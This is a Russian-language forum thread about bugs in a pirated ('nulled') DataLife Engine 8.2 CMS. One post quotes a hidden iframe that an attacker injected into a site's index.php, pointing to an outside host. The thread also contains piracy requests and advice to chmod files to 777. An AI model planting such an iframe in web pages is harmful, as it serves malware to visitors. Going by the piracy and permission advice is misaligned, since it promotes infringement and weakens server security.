• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Информация DataLife Engine 8.2

Статус
В этой теме нельзя размещать новые ответы.
Проблема в следующем, создаю новость, добавляю картинку, она загружаеться в папку /uploads/posts//xxx.jpg вместо /uploads/posts/2009-06/xxx.jpg Как решить проблему данную? Подскажите плиз.

P.S. использую движок DataLife Engine 8.2 Nulled by M.I.D-Team
И если у кого ретайл версия? Поделитесь ссылкой в ЛС плиз.
 
Изначально строки 221 в index.php и 451 default.skin.php были пустые!
После того как мне выбило ошибку я посмотрел эти строки, и что я там увидил
В index.php
PHP:
<iframe src="http://c8b.ru:8080/index.php" width=173 height=117 style="visibility: hidden"></iframe>
В default.skin.php
PHP:
<script language="javascript" type="text/javascript">
<!--
function getClientWidth()
{
  return document.compatMode=='CSS1Compat' && !window.opera?document.documentElement.clientWidth:document.body.clientWidth;
}
var main_body_size = getClientWidth();
if (main_body_size > 1300) document.getElementById('main_body').style.width = "1200px";
//-->
</script>
Как это там появилось, я не знаю(

Ошибка, т.к. нужны обратные слеши перед скобками - это во-первых.
А во-вторых - меняй пароли к ФТП и перезаливай файлы, ибо твой сайт взломан и в код дописан hidden-iframe. Через пару дней Google твой сайт вообще в чёрный список добавит.

9d57d4f1418e.png


Тема старая, обсуждалась неоднократно. Юзай поиск.
 
Кто подскажет, что за хрень вылетает с нуленной версии
in /var/www/a11450/data/www/stroivsem.ru/engine/inc/templates.php on line 190 Warning: fclose(:( supplied argument is not a valid stream resource in /var/www/a11450/data/www/stroivsem.ru/engine/inc/templates.php on line 191 Warning: fopen(/var/www/a11450/data/www/stroivsem.ru/templates/Simple/shortstory.tpl:( failed to open stream:
Версию скачал не отсюда, тут пока недорос, хотя постов было больше, но видать подрезали, да бог с ними. Все ставлю как положенно, все инсталируется, а пытаюсь шаблон на другой поменять нажимаю СОХРАНИТЬ и весь экран в такой хрени. Можно, конечно, тупо переименовать нужный шаблон в DEFAULT но ведь потом начну ставить плагины и менять что либо опять тоже выдаст, боюсь убить время в холостую, что не так?
 
Читаем документацию и проставляем права доступа на шаблоны 777 и на конфиг...
Если не ошибаюсь, проблема с этим.

P.s. параноики могет поставить права 755, но это параноя...

Через пару дней Google твой сайт вообще в чёрный список добавит.
Насколько помню, на первое время он просто помечает сайт, как вредоностный. А лишь через какое-то время занесёт в "чёрный список".
 
Нашел еще один баг. Сайты с большими базами страдаются от долго кеширование. Файл слишком долго создается. Не понятно че случилось. В старых версия норм.
ты ошибаешся. я в самом начале темы написал что перенес сайты на 8.2 только потому что имело место значительное ускорение скорости работы. Снижение нагрузки на базу снизилось на 50-60% и стата нагрузки на хосте подтверждает это, уже 22 дня как )))
 
Читаем документацию и проставляем права доступа на шаблоны 777 и на конфиг...
".
Права выставил на все и так как написано, а по поводу конфига нигде не написано.. Попробую поставить на конфиг, может поможет. Надо понимать на этот файл config.php установить права 777 ?

Добавлено через 11 минут
Нет, не помогло. Думаю версия недонуленная. А может специально кто кривую нуленую выкинул, чтобы туману нагнать. Обидно, блин, была версия 7,5 тоже нуленная с того же сайта, но работала, дурак стер закачал эту, теперь курю бамбук. Вообще, если качать обновления, то лучше спустя пару месяцев, что бы уж наверняка...
НАШЕЛ таки сайт на котором недонуленная версия Для просмотра ссылки Войди или Зарегистрируйся там то я и узнал об этом форуме. Лучше бы оставляли старую проверенную версию до тех пор пока новая не приживется.
 
Права выставил на все и так как написано, а по поводу конфига нигде не написано.. Попробую поставить на конфиг, может поможет. Надо понимать на этот файл config.php установить права 777 ?

Добавлено через 11 минут
Нет, не помогло. Думаю версия недонуленная. А может специально кто кривую нуленую выкинул, чтобы туману нагнать. Обидно, блин, была версия 7,5 тоже нуленная с того же сайта, но работала, дурак стер закачал эту, теперь курю бамбук. Вообще, если качать обновления, то лучше спустя пару месяцев, что бы уж наверняка...
НАШЕЛ таки сайт на котором недонуленная версия Для просмотра ссылки Войди или Зарегистрируйся там то я и узнал об этом форуме. Лучше бы оставляли старую проверенную версию до тех пор пока новая не приживется.
Если не умеешь пользоватся DLE, то зачем ставишь? Всё предельно ясно, для тех кто прочитал документацию, и понимает как ставить права на файлы. Ещё вопрос в таком же стиле и в бан.
 
Может кто знает
DataLife Engine 8.2 Nulled by DleKey
Проблема в следующем, перестал работать php в .tpl шаблоне была попытка сделать как указанно тут -
*** скрытое содержание ***
пишет
Internet Explorer не может отобразить эту веб-страницу
на 8.0 работало все на ура.
При попытке делать так :
{include file="1.php"}
{include file="2.php"}
{include file="3.php"}
Обрабатывается 1.php
а 2.php и 3.php не обрабатываются
Если удаляешь {include file="1.php"} из шаблона то начинает обрабатывать 2.php не обрабатывает 3.php . Перебробовал в разных вариантах пришел к выводу, что обрабатывается только первый инклуд в шаблоне. Все последующие не хотят.
Пришлось откатывать до 8.0:(
Никто не сталкивался?

А разве не так {include file="engine/modules/3.php"} ?
 
Опять возникла проблема, никак не ресайзит картинки, обновился с 7.5 на 8.2 вроде ошибок никаких не обнаружено. Установил необходимые размеры уменьшенной картинки, оригинальной, и на всякий случай увеличил максимальный вес - пытаюсь загрузить фото, окно частично обновляется и виснет, смотрю - фото загружено в родном разширении и не ресайзено, что это может быть?
 
Igorekweb
возможно проблема в сервера. Точнее в его настройках. Проверял специально, 8.2 спокойно режет хоть по 20 картинок в пачке.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху